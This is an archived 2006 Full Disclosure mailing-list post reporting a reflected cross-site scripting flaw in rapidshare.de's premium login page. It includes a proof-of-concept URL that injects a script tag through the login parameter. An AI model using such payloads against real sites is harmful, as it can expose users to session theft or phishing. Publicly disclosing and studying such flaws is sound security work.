Full Disclosure mailing list archives
XSS in rapidshare.de
From: "(M.o.H.a.J.a.L.i)" <mohajali2k4 () gmail com>
Date: Sun, 29 Jan 2006 02:01:07 +0200
Hello All.. i found an XSS vulnerability in the widely known file hosting company : http://rapidshare.de The Vulnerability is in the premium members area: https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi and it goes like this: https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=XSSHERE&password=anything https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=<script>alert("XSS%20IN%20RAPIDSHARE%20BY%20MOHAJALI");</script>&password=anything http://mohajali.lezr.org Salam -- (r).....Now I Am Become Death....The Destroyer Of Worlds....(c)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS in rapidshare.de (M.o.H.a.J.a.L.i) (Jan 28)
- Re: XSS in rapidshare.de Mbyte Security (Jan 28)
- Re: XSS in rapidshare.de ad () heapoverflow com (Jan 29)
- Re: XSS in rapidshare.de (M.o.H.a.J.a.L.i) (Jan 28)
- Re: Re: XSS in rapidshare.de Hugo Vazquez Carapez (Jan 28)
- Re: XSS in rapidshare.de Mbyte Security (Jan 28)